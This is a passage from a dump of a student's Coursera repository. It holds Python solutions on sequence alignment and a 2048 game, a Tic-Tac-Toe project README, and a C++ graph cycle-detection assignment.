answer.\n#\n# Ans: The number of elements matching between each local alignment to the PAX \n# consensus domain is too high to deemed that they matched due to chance.\n# \n# For local human vs PAX, 97 out of 133 elements match and the probability\n# for all 97 of them to match due to chance would be quite small given than we have\n# to randomly choose between 23 alphabets and that the probability of choosing\n# an element is equal for all alphabets\n#\n# The same can be said for the local fly vs PAX where 94 out of the 134 elements\n# match\n\nprint \"Q3 Answers:\"\nprint \"length of global alignment of human vs pax: \", len(align_pax_hum)\nprint \"number of elements matching in this global alignment: \", int(count_pax_hum)\nprint \"length of global alignment of fly vs pax: \", len(align_pax_fly)\nprint \"number of elements matching in this global alignment: \", int(count_pax_fly)\nprint \n\n##########################################################################\n# Solution Q4\n#\n# Q4: Write a function generate_null_distribution(seq_x, seq_y, scoring_matrix, num_trials) \n# that takes as input two sequences seq_x and seq_y, a scoring matrix scoring_matrix, and a \n# number of trials num_trials. This function should return a dictionary scoring_distribution \n# that represents an un-normalized distribution generated by performing the following process \n# num_trials times:\n#\n# - Generate a random permutation rand_y of the sequence seq_y using random.shuffle().\n# - Compute the maximum value score for the local alignment of seq_x and rand_y using the score \n# matrix scoring_matrix.\n# - Increment the entry score in the dictionary scoring_distribution by one.\n#\n# Use the function generate_null_distribution to create a distribution with 1000 trials using \n# the protein sequences HumanEyelessProtein and FruitflyEyelessProtein (using the PAM50 scoring matrix). \n# Important: Use HumanEyelessProtein as the first parameter seq_x (which stays fixed) and \n# FruitflyEyelessProtein as the second parameter seq_y (which is randomly shuffled) when calling \n# generate_null_distribution. Switching the order of these two parameters will lead to a slightly \n# different answers for question 5 that may lie outside the accepted ranges for correct answers.\n# \n# Next, create a bar plot of the normalized version of this distribution using plt.bar in \n# matplotlib (or your favorite plotting tool). (You will probably find CodeSkulptor too slow to \n# do the required number of trials.) The horizontal axis should be the scores and the vertical axis \n# should be the fraction of total trials corresponding to each score. As usual, choose reasonable \n# labels for the axes and title. Note: You may wish to save the distribution that you compute in \n# this Question for later use in Question 5.\n\ndef generate_null_distribution(seq_x, seq_y, scoring_matrix, num_trials):\n \"\"\"\n Takes as input two sequences seq_x and seq_y, a scoring matrix scoring_matrix, and a \n number of trials num_trials. This function should return a dictionary scoring_distribution \n that represents an un-normalized distribution generated by performing the following process \n num_trials times:\n\n - Generate a random permutation rand_y of the sequence seq_y using random.shuffle().\n - Compute the maximum value score for the local alignment of seq_x and rand_y using the score \n matrix scoring_matrix.\n - Increment the entry score in the dictionary scoring_distribution by one. \n \n Arguments:\n seq_x {string} -- a sequence of alphabets representing amino acids\n seq_y {string} -- a sequence of alphabets representing amino acids\n scoring_matrix {dict of dict} -- the scoring matrix for the all alphabet plus \"-\" combination\n num_trials {integer} -- the number of trial\n \n Returns:\n dict -- a dictionary representing the scoring distribution \n \"\"\"\n\n # initialize the scoring distribution\n scoring_distribution = {}\n\n for dummy_idx in range(num_trials):\n # generate a random permutation for the seq_y\n rand_y = list(seq_y)\n random.shuffle(rand_y)\n rand_y = \"\".join(rand_y)\n\n # compute the local alignments matrix for seq_x and rand_y\n local_align_matrix = alg_proj4_sol.compute_alignment_matrix(seq_x, rand_y, scoring_matrix, False)\n\n # compute the local alignment score for the two sequences\n (score, _, _) = alg_proj4_sol.compute_local_alignment(seq_x, rand_y, scoring_matrix, local_align_matrix)\n\n # increment the entry score in the scoring_distribution\n if scoring_distribution.has_key(score):\n scoring_distribution[score] += 1\n else:\n scoring_distribution[score] = 1 \n\n\n return scoring_distribution\n\n# get the scoring distribution for 1000 trial for HumanEyelessProtein and FruitflyEyelessProtein\nscoring_dist = generate_null_distribution(human_seq, fly_seq, scoring_matrix, 1000)\n\nsum_of_vals = float(sum(scoring_dist.values()))\nnorm_values = [value/sum_of_vals for value in scoring_dist.values()]\nplt.bar(scoring_dist.keys(), norm_values)\nplt.title('Hypothesis testing for 1000 trials for null distribution')\nplt.xlabel('Local alignment scores')\nplt.ylabel('frequency of scores/fraction of trials')\nplt.xlim(None, None)\nplt.ylim(None, None)\nplt.show()\n\n# ##########################################################################\n# Solution Q5\n#\n# Q5: What are the mean and standard deviation for the distribution that you \n# computed in Question 4?\n# What is the z-score for the local alignment for the human eyeless protein vs. \n# the fruitfly eyeless protein based on these values?\n\n# calculate the mean of the distribution\nnum_trials = 1000.0\nmean_mu = sum([key * value for key, value in scoring_dist.items()])/num_trials\n\n# calculate the standard deviation \nsigma = sum([((key - mean_mu) ** 2) * value for key, value in scoring_dist.items()])/num_trials\nsigma = sigma ** 0.5\n\n# use mean and standard deviation to calculate the z score\nz_score = (score_q1 - mean_mu)/sigma\n\nprint \"Q5 Answers\"\nprint \"mean of the distrubution: \", mean_mu\nprint \"standard deviation of distribution: \", sigma\nprint \"z-score of the distribution: \", z_score\nprint\n\n##########################################################################\n# Solution Q6\n#\n# Q6: Based on your answers to Questions 4 and 5, is the score resulting from the local \n# alignment of the HumanEyelessProtein and the FruitflyEyelessProtein due to chance? As \n# a concrete question, which is more likely: the similarity between the human eyeless \n# protein and the fruitfly eyeless protein being due to chance or winning the jackpot \n# in an extremely large lottery? Provide a short explanation for your answers\n#\n# Ans: the z-score is around 100 which means it right at the corner of the bell\n# shaped. 1 standard deviation from the mean of around 50 is about 7. And\n# we know that 3 standard deviations(sigma) covers about 99% of bell shape, i.e the \n# likelihood of value falling within 3 sigma is high and the probability of\n# value to fall outside 3 sigma is about 1%. The z-score we found tells us that\n# the value of the score we found in Q1 is about 100 standard away from mean\n# (score of 875 is more than 100 * sigma + mean)\n# We can find the exact probality using the z test for normal distribution\n# which gives us a probablity on the order of 10^(-2000)\n# (https://www.wolframalpha.com/input/?i=Probability+of+100+standard+deviations)\n# which is much smaller than the chance of winning a lottery \n\n##########################################################################\n# Solution Q7\n#\n# Not surprisingly, similarity between pairs of sequences and edit distances between pairs \n# of strings are related. In particular, the edit distance for two strings x and y can be \n# expressed in terms of the lengths of the two strings and their corresponding similarity \n# score as follows: |x| + |y| - score(x, y) where score(x, y) is the score returned by the \n# global alignment of these two strings using a very simple scoring matrix that can be \n# computed using build_scoring_matrix.\n# Determine the values for diag_score, off_diag_score, and dash_score such that the score \n# from the resulting global alignment yields the edit distance when substituted into the \n# formula above\n#\n# Ans: \n# 1-Let x = \"ABC\" and y = \"\". Then global alignment will return x' = \"ABC\" and y' = \"---\"\n# so |x| = 3 and |y| = 0 and edit distance need 3 substitution operation to subsitute \"---\"\n# to \"ABC\" and score(x', y') = |x'| +|y'| - 3 = 0. Therefore, dash_score = 0\n# dash_score = 0\n\n# 2-Let x = \"ABC\" and y = \"ABC\". Then global alignment returns the same strings and edit\n# distance need zero operations. Hence score(x, y) = |x| + |y| - 0 = 3 + 3 = 6. Thus\n# diag_score must be 2 for the score of x, y to be 6\n# diag_score = 2\n\n# 3-Let x = \"ABC\" and y = \"ABT\". Then global alignment resturns the same strings with\n# total score of score of string \"C\" and \"T\" + 2 * diag_score. Hence edit distance needs\n# subsitution od \"T\" to \"C\" i.e one operation. Thus we have:\n# score(\"C\", T) + 2 * diag_score = |x| + |y| - 1 \n# off_diag_score = 3 + 3 - 1 - 2 * 2 = 1\n# off_diag_score = 1 \n\n##########################################################################\n# Solution Q8\n#\n# Q8: For this final question, we will implement a simple spelling correction function that \n# uses edit distance to determine whether a given string is the misspelling of a word.\n# To begin, load this list of 79339 words. Then, write a function \n# check_spelling(checked_word, dist, word_list) that iterates through word_list and returns \n# the set of all words that are within edit distance dist of the string checked_word.\n# Use your function check_spelling to compute the set of words within an edit distance of \n# one from the string \"humble\" and the set of words within an edit distance of two from the \n# string \"firefly\".\n#\n\ndef check_spelling(checked_word, dist, word_list):\n \"\"\"[summary]\n \n Arguments:\n checked_word {[type]} -- [description]\n dist {[type]} -- [description]\n word_list {[type]} -- [description]\n \n Returns:\n [type] -- [description]\n \"\"\"\n \n # initialize the set that will contain a list of words within edit distance dist\n # from word_list\n within_dist = set()\n\n # initalize a set of alphabets\n alphabets = set(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'])\n\n # compute the scoring matrix for of scores calculated in Q7\n score_mat = alg_proj4_sol.build_scoring_matrix(alphabets, 2, 1, 0)\n\n for word in word_list:\n # compute the global alignment matrix\n align_mat = alg_proj4_sol.compute_alignment_matrix(word, checked_word, score_mat, True)\n\n # compute the global alignment score of the word\n (score, _, _) = alg_proj4_sol.compute_global_alignment(word, checked_word, score_mat, align_mat)\n\n # add the word to the within_dist set if it edit distance is within edit distance dist\n if (len(word) + len(checked_word) - score) <= dist:\n within_dist.add(word)\n\n return within_dist\n\n# load the word list\nword_list = alg_app4_prov.read_words(alg_app4_prov.WORD_LIST_URL)\n\n# compute the set of word that are within edit distance 1 of string \"humble\"\nwith_wrds_humble = check_spelling(\"humble\", 1, word_list)\n\n# compute the set of word that are within edit distance 2 of string \"firefly\"\nwith_wrds_firefly = check_spelling(\"firefly\", 2, word_list)\n\nprint \"Q8 Answers:\"\nprint \"words within 1 edit distance of string 'humble': \\n\", with_wrds_humble\nprint \"words within 2 edit distance of string 'firefly': \\n\", with_wrds_firefly\n"
},
{
"alpha_fraction": 0.5467495322227478,
"alphanum_fraction": 0.5588725805282593,
"avg_line_length": 32.83589553833008,
"blob_id": "0f936b900e071c58d2d85a37b4cdf890dd75bd62",
"content_id": "080b6f780660c8a5b957ad9a23dea292aed7840f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6599,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 195,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project2 Game 2048/game_2048.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nClone of 2048 game.\n\"\"\"\n\nimport poc_2048_gui\nimport random\n\n# Directions, DO NOT MODIFY\nUP = 1\nDOWN = 2\nLEFT = 3\nRIGHT = 4\n\n# Other global constants\nEMPTY = 0\n\n# Offsets for computing tile indices in each direction.\n# DO NOT MODIFY this dictionary.\nOFFSETS = {UP: (1, 0),\n DOWN: (-1, 0),\n LEFT: (0, 1),\n RIGHT: (0, -1)}\n\ndef merge(line):\n \"\"\"\n Helper function that merges a single row or column in 2048\n \"\"\"\n # create an empty list\n mergelst = []\n \n # put all non-zero values from the list line to begining of mergelst\n for val in list(line):\n if (val != 0):\n mergelst.append(val)\n \n # replace same pairs values with twice it's value\n mergelst2 = [];\n idx = 0\n while idx < (len(mergelst)):\n if (idx < len(mergelst)-1 and mergelst[idx] == mergelst[idx+1]):\n mergelst2.append(2*mergelst[idx])\n idx += 1\n else:\n mergelst2.append(mergelst[idx])\n \n idx +=1\n \n # add zeros at the end of merged list to make the size same as list line \n mergelst2.extend([0]*(len(line)-len(mergelst2)))\n \n return mergelst2\n\ndef get_indices(lst_of_lst):\n \"\"\"\n Helper function that travesrses over a list of lists and returns\n a list of indices corresponding to zero value\n \"\"\"\n # initialize empty list to hold indices(row, col) for locations\n # of zero value in the input list \n lst_of_indices = []\n # iterate over the input list and add indices(row,col) as required\n for row_idx in range(len(lst_of_lst)):\n lst_of_indices += [[row_idx, col_idx] \n for col_idx in range(len(lst_of_lst[row_idx])) \n if lst_of_lst[row_idx][col_idx] == EMPTY ]\n \n return lst_of_indices\n\nclass TwentyFortyEight:\n \"\"\"\n Class to run the game logic.\n \"\"\"\n\n def __init__(self, grid_height, grid_width):\n # intialize the class private members\n self._grid_height = grid_height\n self._grid_width = grid_width\n self._grid_empty_indices = []\n self._grid = []\n # holds the initial/starting tile values for each direction\n self._strt_tiles = {UP: [(0,col) for col in range(self._grid_width)],\n DOWN: [(self._grid_height - 1,col) for col in range(self._grid_width)],\n LEFT: [(row, 0) for row in range(self._grid_height)],\n RIGHT: [(row, self._grid_width - 1) for row in range(self._grid_height)]}\n # reset creates any empty grid and adds two new tiles\n self.reset()\n \n def reset(self):\n \"\"\"\n Reset the game so the grid is empty except for two\n initial tiles.\n \"\"\"\n # create an empty grid(list of lists)\n self._grid = [[0] * self._grid_width \n for dummy_num in range(self._grid_height)]\n self.new_tile()\n self.new_tile()\n\n def __str__(self):\n \"\"\"\n Return a string representation of the grid for debugging.\n \"\"\"\n # replace with your code\n grid_str = \"current grid values:\\n\"\n for row in range(self._grid_height):\n grid_str += str(self._grid[row])+ \"\\n\"\n return grid_str\n\n def get_grid_height(self):\n \"\"\"\n Get the height of the board.\n \"\"\"\n return self._grid_height\n\n def get_grid_width(self):\n \"\"\"\n Get the width of the board.\n \"\"\"\n return self._grid_width\n\n def move(self, direction):\n \"\"\"\n Move all tiles in the given direction and add\n a new tile if any tiles moved.\n \"\"\"\n # state to store if any title value has changed or not after a move\n changed = False\n # iterate of initial/start tile for the given direction to perform move\n for row, col in self._strt_tiles[direction]:\n # line will hold all the row or cols for the given starting tile\n line = []\n # store the start tile row and column\n strt_row = row\n strt_col = col\n # iterate over all tiles starting at the start tile and add the values\n # of the tiles to a temporay list line\n while 0 <= row < self.get_grid_height() and 0 <= col < self.get_grid_width():\n line.append(self.get_tile(row, col))\n row += OFFSETS[direction][0]\n col += OFFSETS[direction][1]\n \n # perform merge on the stored values for a given row or column of the grid \n merge_line = merge(line)\n # check to see if any values changed during merge and update the value\n # of that location on the grid\n for val in merge_line:\n if val != self.get_tile(strt_row, strt_col):\n changed = True\n self.set_tile(strt_row, strt_col, val)\n strt_row += OFFSETS[direction][0]\n strt_col += OFFSETS[direction][1]\n \n # if any tile changed during a move along a given direction, randomly\n # add a new tile\n if (changed):\n self.new_tile()\n \n\n def new_tile(self):\n \"\"\"\n Create a new tile in a randomly selected empty\n square. The tile should be 2 90% of the time and\n 4 10% of the time.\n \"\"\"\n # get a list of all the empry location on the grid\n self._grid_empty_indices = get_indices(self._grid)\n\n # add new tile only to if grid has any empty tiles \n if len(self._grid_empty_indices) != EMPTY:\n # randomly select an empty row and col indices of the grid\n rnd_val = random.randrange(0, len(self._grid_empty_indices))\n # get the row and col number of this empty tile\n row = self._grid_empty_indices[rnd_val][0]\n col = self._grid_empty_indices[rnd_val][1]\n # create a list of nine 2's and one 4 to achieve the 90%\n # and 10% probablity criteria\n lst_tiles = [2] * 9 + [4]\n # select 2 90% or 4 10% of the time and set it to the empty\n # tile value randomly selected earlier\n self._grid[row][col] = random.choice(lst_tiles) \n\n def set_tile(self, row, col, value):\n \"\"\"\n Set the tile at position row, col to have the given value.\n \"\"\"\n self._grid[row][col] = value\n\n def get_tile(self, row, col):\n \"\"\"\n Return the value of the tile at position row, col.\n \"\"\"\n return self._grid[row][col]\n\n\npoc_2048_gui.run_gui(TwentyFortyEight(4, 4))\n\n"
},
{
"alpha_fraction": 0.7761263251304626,
"alphanum_fraction": 0.7858801484107971,
"avg_line_length": 133.5625,
"blob_id": "effc043fd4890a675e2ff0ce0bef633a207ae33e",
"content_id": "08478ecf5dc6eff750839e098805b59c6819885a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2153,
"license_type": "no_license",
"max_line_length": 831,
"num_lines": 16,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project3 Tic-Tac-Toe(Minimax)/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #3 Tic-Tac-Toe(Minimax)\n\nImplemented the machine player for Tic-Tac-Toe game using Minimax strategy in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_NHM1TTnSvs_131.py) and press the play button on the top left corner. A window will pop up, starting the game.\n\nLink to my test suite for the implementation:\n<http://www.codeskulptor.org/#user46_yE2BTCBXxA_1.py>\n\nMini-project overview taken from course page can be found below:\n* We have previously seen Tic-Tac-Toe in part 1 of this class. In this assignment, we are going to revisit the game and develop an alternative strategy to play the game.\n\n* For this assignment, your task is to implement a machine player for Tic-Tac-Toe that uses a Minimax strategy to decide its next move. You will be able to use the same console-based interface and graphical user interface to play the game as you did before. Although the game is played on <a href=\"https://www.codecogs.com/eqnedit.php?latex=3&space;\\times&space;3\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?3&space;\\times&space;3\" title=\"3 \\times 3\" /></a> grid, your version should be able to handle any square grid (however, the time it will take to search the tree for larger grid sizes will be prohibitively slow). We will continue to use the same [grid conventions](https://www.coursera.org/learn/principles-of-computing-2/supplement/2DOSk/math-notes-on-grid-representations) that we have used previously.\n\n* This project does not require you to write a lot of code. It does, however, bring together a lot of concepts that we have previously seen in the class. We would like you to think about how these concepts are coming together to enable you to build a relatively complex machine player with very little code. Further, you should think about the situations in which Minimax or Monte Carlo might produce better/worse machine players for games other than Tic-Tac-Toe.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-2/supplement/hPToP/mini-project-description>\n"
},
{
"alpha_fraction": 0.5621632933616638,
"alphanum_fraction": 0.5738707184791565,
"avg_line_length": 41.89777755737305,
"blob_id": "6260a9f7e5895182bb565cd18245294c61564685",
"content_id": "552aacf344ba40e977da64dee7985eb3aee549c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9652,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 225,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 2)/Module 4/alg_project4_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAll the algorithms for Project#4 - Computing\nAlignments of Sequences\n\"\"\"\n\ndef build_scoring_matrix(alphabet, diag_score, off_diag_score, dash_score):\n \"\"\"\n The function computes a scoring matrix(a dictionary of dictionaries)\n whose entries are indexed by pairs of characters in alphabet plus '-' \n The score for any entry indexed by one or more dashes is dash_score. \n The score for the remaining diagonal entries is diag_score. Finally, \n the score for the remaining off-diagonal entries is off_diag_score.\n\n Arguments:\n alphabet {set} -- a set of characters\n diag_score {integer} -- the diagnal score for the scoring matrix\n off_diag_score {integer} -- the off diagnal score\n dash_score {[type]} -- the score that includes atleast one dash\n \n Returns:\n a dictionary of dictionary -- the scoring matrix \n \"\"\"\n # initialize the scoring matrix\n scoring_matrix = {}\n # add the dash character to the set of alphabets\n all_chars = alphabet.union(\"-\")\n\n # create a dictionary of dictionary for scores \n for char_i in all_chars:\n scoring_matrix[char_i] = {}\n for char_j in all_chars:\n if (char_i == \"-\" or char_j == \"-\"):\n scoring_matrix[char_i][char_j] = dash_score \n elif (char_i == char_j):\n scoring_matrix[char_i][char_j] = diag_score\n else:\n scoring_matrix[char_i][char_j] = off_diag_score\n\n\n return scoring_matrix\n\ndef compute_alignment_matrix(seq_x, seq_y, scoring_matrix, global_flag):\n \"\"\"\n Takes as input two sequences seq_x and seq_y whose elements share a common \n alphabet with the scoring matrix scoring_matrix. The function computes and \n returns the alignment matrix for seq_x and seq_y. If global_flag is True, \n the global alignment matrix is computed. If global_flag is False, local \n alignment matrix is computed\n\n For global alignment matrix S, each entry S[i][j] contains the maximum score \n over every possible global alignment of the pair of sequences seq_x[0...i-1] and\n seq_y[0...j-1] \n\n For local alignment matrix S, each entry entry S[i][j] contains the maximum score \n over every possible alignment of the pair of sequences seq_x[0...i-1] and \n seq_y[0...j-1] except for the case when S[i][j] < 0, S[i][j] is set to zero\n\n Arguments:\n seq_x {string} -- a string of alphabets whose elements share a common alphabet \n with scoring matrics\n seq_y {string} -- a string of alphabets whose elements share a common alphabet \n with scoring matrics\n scoring_matrix {a dictionary of dictionaries} -- the scoring matrix with each\n alphabet plus '-' combination\n scores\n global_flag {bolean -- flag to choose between global and local alignment\n \n Returns:\n list of lists -- an alignment matrix for seq_x and seq_y \n \"\"\"\n # let align_matrix = S. Then initialize S[0][0] = 0\n align_matrix = [[0]]\n\n # set the alignment matrix's column 0 to appropriate score either based on local or global\n # alignment selected\n for idx in range(1, len(seq_x) + 1):\n align_matrix.append([align_matrix[idx - 1][0] + scoring_matrix[seq_x[idx - 1]][\"-\"] ])\n if not global_flag and align_matrix[idx][0] < 0:\n align_matrix[idx][0] = 0\n\n # set the alignment matrix's row 0 to appropriate score either based on local or global\n # alignment selected\n for idx in range(1, len(seq_y) + 1):\n align_matrix[0].append(align_matrix[0][idx - 1] + scoring_matrix[\"-\"][seq_y[idx - 1]])\n if not global_flag and align_matrix[0][idx] < 0:\n align_matrix[0][idx] = 0\n\n # set the remaining alignment matrix(S) values based on previous 3 values of S[i-1][j-1], S[i-1][j],\n # and S[i][j-1]\n for idx_x in range(1, len(seq_x) + 1):\n for idx_y in range(1, len(seq_y) + 1):\n val1 = align_matrix[idx_x - 1][idx_y - 1] + scoring_matrix[seq_x[idx_x - 1]][seq_y[idx_y - 1]]\n val2 = align_matrix[idx_x - 1][idx_y] + scoring_matrix[seq_x[idx_x - 1]][\"-\"]\n val3 = align_matrix[idx_x][idx_y - 1] + scoring_matrix[\"-\"][seq_y[idx_y - 1]]\n align_matrix[idx_x].append(max(set([val1, val2, val3])))\n if not global_flag and align_matrix[idx_x][idx_y] < 0:\n align_matrix[idx_x][idx_y] = 0\n\n return align_matrix\n\ndef compute_global_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n \"\"\"\n Takes as input two sequences seq_x and seq_y whose elements share a common alphabet\n with the scoring matrix scoring_matrix. This function computes a global alignment of\n seq_x and seq_y using the global alignment matrix alignment_matrix. The function returns\n a tuple of the form (score, align_x, align_y) where score is the score of the global \n alignment align_x and align_y. Note that align_x and align_y should have the same \n length and may include the padding character '-'.\n\n Arguments:\n seq_x {string} -- a string of alphabets\n seq_y {string} -- a string of alphabets\n scoring_matrix {dictionary of dictionaries} -- the scoring matrix\n alignment_matrix {list of lists} -- the global alignment matrix\n \n Returns:\n tuple -- returns (score, align_x, align_y) where score is the score of the global \n alignment align_x and align_y.\n \"\"\"\n\n # intialize the indicies to the lengths of the sequences\n idx_x = len(seq_x)\n idx_y = len(seq_y)\n align_x = \"\"\n align_y = \"\"\n score = 0\n\n while (idx_x != 0 and idx_y != 0):\n if (alignment_matrix[idx_x][idx_y] == (alignment_matrix[idx_x - 1][idx_y - 1] \n + scoring_matrix[seq_x[idx_x - 1]][seq_y[idx_y - 1]])):\n align_x = seq_x[idx_x - 1] + align_x\n align_y = seq_y[idx_y - 1] + align_y\n score += scoring_matrix[seq_x[idx_x - 1]][seq_y[idx_y - 1]]\n idx_x -= 1\n idx_y -= 1\n \n else:\n if (alignment_matrix[idx_x][idx_y] == (alignment_matrix[idx_x - 1][idx_y] \n + scoring_matrix[seq_x[idx_x - 1]][\"-\"])):\n align_x = seq_x[idx_x - 1] + align_x\n align_y = \"-\" + align_y\n score += scoring_matrix[seq_x[idx_x - 1]][\"-\"]\n idx_x -= 1\n\n else:\n align_x = \"-\" + align_x\n align_y = seq_y[idx_y - 1] + align_y\n score += scoring_matrix[\"-\"][seq_y[idx_y - 1]]\n idx_y -= 1\n \n while idx_x != 0:\n align_x = seq_x[idx_x - 1] + align_x\n align_y = \"-\" + align_y\n score += scoring_matrix[seq_x[idx_x - 1]][\"-\"]\n idx_x -= 1\n\n while idx_y != 0:\n align_x = \"-\" + align_x\n align_y = seq_y[idx_y - 1] + align_y\n score += scoring_matrix[\"-\"][seq_y[idx_y - 1]]\n idx_y -= 1 \n \n\n return (score, align_x, align_y)\n\ndef compute_local_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n \"\"\"\n Takes as input two sequences seq_x and seq_y whose elements share a common alphabet\n with the scoring matrix scoring_matrix. This function computes a local alignment of\n seq_x and seq_y using the local alignment matrix alignment_matrix. The function returns\n a tuple of the form (score, align_x, align_y) where score is the score of the local \n alignment align_x and align_y. Note that align_x and align_y should have the same \n length and may include the padding character '-'.\n\n Arguments:\n seq_x {string} -- a string of alphabets\n seq_y {string} -- a string of alphabets\n scoring_matrix {dictionary of dictionaries} -- the scoring matrix\n alignment_matrix {list of lists} -- the global alignment matrix\n \n Returns:\n tuple -- returns (score, align_x, align_y) where score is the score of the global \n alignment align_x and align_y.\n \"\"\"\n \n # initialize the variables\n max_value = float(\"-inf\")\n idx_x = -1\n idx_y = -1\n align_x = \"\"\n align_y = \"\"\n score = 0\n\n # find the location (row, col) of the maximum value in alignment_matrix\n for row in range(len(alignment_matrix)):\n for col in range(len(alignment_matrix[row])):\n if alignment_matrix[row][col] > max_value:\n max_value = alignment_matrix[row][col]\n idx_x = row\n idx_y = col\n\n while alignment_matrix[idx_x][idx_y] != 0 and idx_x != 0 and idx_y != 0:\n if (alignment_matrix[idx_x][idx_y] == (alignment_matrix[idx_x - 1][idx_y - 1] \n + scoring_matrix[seq_x[idx_x - 1]][seq_y[idx_y - 1]])):\n align_x = seq_x[idx_x - 1] + align_x\n align_y = seq_y[idx_y - 1] + align_y\n score += scoring_matrix[seq_x[idx_x - 1]][seq_y[idx_y - 1]]\n idx_x -= 1\n idx_y -= 1\n \n else:\n if (alignment_matrix[idx_x][idx_y] == (alignment_matrix[idx_x - 1][idx_y] \n + scoring_matrix[seq_x[idx_x - 1]][\"-\"])):\n align_x = seq_x[idx_x - 1] + align_x\n align_y = \"-\" + align_y\n score += scoring_matrix[seq_x[idx_x - 1]][\"-\"]\n idx_x -= 1\n\n else:\n align_x = \"-\" + align_x\n align_y = seq_y[idx_y - 1] + align_y\n score += scoring_matrix[\"-\"][seq_y[idx_y - 1]]\n idx_y -= 1\n \n return (score, align_x, align_y)\n"
},
{
"alpha_fraction": 0.5364842414855957,
"alphanum_fraction": 0.5677169561386108,
"avg_line_length": 24.602941513061523,
"blob_id": "e83b5fb9d6cafeea302916e71ecdba07103a62d9",
"content_id": "8fa92d5b09436723733a3060a5e2f3480f4835f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3636,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 136,
"path": "/Algorithms on Graphs/Assignment2/acyclicity.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: acyclicity.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-03\r\n// description: Problem 1 of the second assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was : Check whether a given directed graph with n vertices \r\n//\t\t\t\tand m edges contains a cycle.\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tDFS and acyclic functions and testing had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.01/1.00 sec, max memory used: 7.57/512 MB. \r\n\r\n\r\n#include <iostream>\r\n#include <vector>\r\n\r\nusing std::vector;\r\nusing std::pair;\r\n\r\n/**\r\nPeforms a Depth first search on a given vertice v to check for cycles\r\n\r\nPRE: 1 ≤ adj.size() ≤ 10e3 , 0 ≤ graph edges ≤ 10e3, visited.size() = adj.size()\r\nPOST: return true if the given vertice can reach to itself, false otherwise.\r\nPARAM: adj = a graph in the form of adjacency list\r\n\t visited = a vector to store the visited state of each vertice\r\n\t u = a vertice of the graph adj \r\n**/\r\nbool DFS(vector<vector<int> > &adj, vector<bool> visited, int u) {\r\n\t\r\n\tvisited[u] = true;\r\n\tbool res = false;\r\n\r\n\r\n\tfor (vector<int>::size_type v = 0; v < adj[u].size(); v++) {\r\n\r\n\t\tif (visited[adj[u][v]] == true) {\r\n\t\t\treturn true;\r\n\t\t}\r\n\r\n\t\telse {\r\n\r\n\t\t\tres = DFS(adj, visited, adj[u][v]);\r\n\t\t\tif (res == true)\r\n\t\t\t\treturn true;\r\n\r\n\t\t}\r\n\t}\r\n\r\n\treturn false;\r\n}\r\n\r\n/**\r\nFinds if there exist a cycle in the graph\r\n\r\nPRE: 1 ≤ adj.size() ≤ 10e3 , 0 ≤ graph edges ≤ 10e3\r\nPOST: returns 1 if the graph contains a cycle , 0 otherwise\r\nPARAM: adj = a graph in the form of adjacency list\r\n\r\n**/\r\n\r\nint acyclic(vector<vector<int> > &adj) {\r\n\t\r\n\tbool result;\r\n\tvector<bool> visited(adj.size(), false);\r\n\r\n\tfor (vector<int>::size_type v = 0; v < adj.size(); v++) {\r\n\t\t\r\n\r\n\t\t\tresult = DFS(adj, visited, v);\r\n\t\t\tif (result == true)\r\n\t\t\t\treturn 1;\r\n\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n\r\nint main() {\r\n\t\r\n\tsize_t n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tfor (size_t i = 0; i < m; i++) {\r\n\t\tint x, y;\r\n\t\tstd::cin >> x >> y;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t}\r\n\tstd::cout << acyclic(adj);\r\n\r\n\t// Few test case to check if the acyclic function works. These are commented since the \r\n\t// assignment requires the acyclicity.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/********************************************************************************\r\n\t\r\n\t//Test case 1: a pair of vertices forms a cycle\r\n\tvector<vector<int> > adj1(4, vector<int>());\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tadj1[2 - 1].push_back(1 - 1);\r\n\r\n\tif (acyclic(adj1) == 0)\r\n\t\tstd::cout << \"Test 1 failed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 1 passed\" << std::endl;\r\n\r\n\t//Test case 2: no cycle\r\n\tvector<vector<int> > adj2(4, vector<int>());\r\n\tadj2[1 - 1].push_back(2 - 1);\r\n\tadj2[2 - 1].push_back(3 - 1);\r\n\tadj2[3 - 1].push_back(4 - 1);\r\n\r\n\tif (acyclic(adj2) == 1)\r\n\t\tstd::cout << \"Test 2 failed\" << 